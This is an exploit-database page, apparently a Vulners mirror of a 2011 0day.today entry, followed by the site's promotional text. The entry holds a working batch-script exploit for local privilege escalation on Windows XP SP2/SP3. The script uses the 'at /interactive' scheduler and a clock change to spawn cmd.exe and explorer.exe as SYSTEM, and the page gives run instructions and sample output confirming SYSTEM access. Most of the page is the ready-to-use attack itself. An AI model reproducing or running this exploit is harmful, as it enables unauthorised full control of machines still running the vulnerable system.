Lucene search
K

Microsoft WinXP sp2/sp3 local system privilege escalation exploit

🗓️ 13 Jun 2011 00:00:00Reported by Todor DonevType 
zdt
 zdt
🔗 0day.today👁 19 Views

Microsoft WinXP sp2/sp3 local system privilege escalation exploi

Code
#  Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
#  Platform: Windows XP SP2/SP3
#  Type: local
#  Exploit Author: Todor Donev [todor.donev][@][gmail.com]
#
#  Good luck and Have fun!!
#  Kind regards to so sweet baby Tsvetelina Emirska
#  Thank you Lina and thanks that all my friends are beside
#  me and support me everytime.
#
#  Description:
#
#  Copy the batch code in newfile with format .cmd or .bat and
#  then start it, wait few seconds and press any key!
#  This exploit kill explorer then use "at" for execute
#  explorer.exe, cmd.exe and change your profile with System user privilege.
#
#
#
#  Use whoami.exe for checking of your user privileges.
#  Download:
#
http://www.microsoft.com/downloads/en/details.aspx?FamilyID=3E89879D-6C0B-4F92-96C4-1016C187D429
#
#
#      !! USE AT YOUR 0WN RISK !!
#  !! ONLY FOR EDUCATIONAL PURPOSE !!
#
#  [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
#  Added a new job with job ID = 1
#  Added a new job with job ID = 2
#  Added a new job with job ID = 3
#  Added a new job with job ID = 4
#  Added a new job with job ID = 5
#  Added a new job with job ID = 6
#  Added a new job with job ID = 7
#  Added a new job with job ID = 8
#  Added a new job with job ID = 9
#  Added a new job with job ID = 10
#  Added a new job with job ID = 11
#  Added a new job with job ID = 12
#  [*] Backup time
#  The current time is: 13:36:57,67
#  Enter the new time: 13:44
#
#  C:\WINDOWS\system32>whoami
#  NT AUTHORITY\SYSTEM
#
##############  CUT HERE ###########################

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y


echo [*] Backup time
time < time.txt

##############  CUT HERE ###########################



#  0day.today [2018-01-24]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation